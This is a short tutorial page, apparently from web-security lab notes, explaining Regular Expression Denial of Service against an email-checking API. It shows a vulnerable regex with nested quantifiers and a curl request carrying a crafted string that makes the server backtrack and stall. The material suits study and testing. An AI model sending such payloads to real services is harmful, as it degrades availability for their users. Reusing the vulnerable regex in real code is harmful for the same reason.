Regular Expression Denial of Service (ReDoS)

Suppose we have a user that submits benign input to an API. On the server side, a developer could match any input against a regular expression.

Interact with the API

curl "http://<TARGET IP>:3000/api/check-email?email=test_value"
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}

Submit a longer string

curl "http://<TARGET IP>:3000/api/check-email?email=tessssssssssssssssssssssssssssssttttttt@cdddddddddddddddddddddddddddddddddd.2222222222222222222222222222222222222222222222222222222222."
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}

You'll notice a significante delay in the response. This proves the API is vulnerable to ReDoS attacks.

Reference links:

regex101: build, test, and debug regexregex101

Regulex：JavaScript Regular Expression Visualizerjex.im

PreviousServer-Side Request Forgery (SSRF)NextXML External Entity (XXE) Injection

Last updated 1 month ago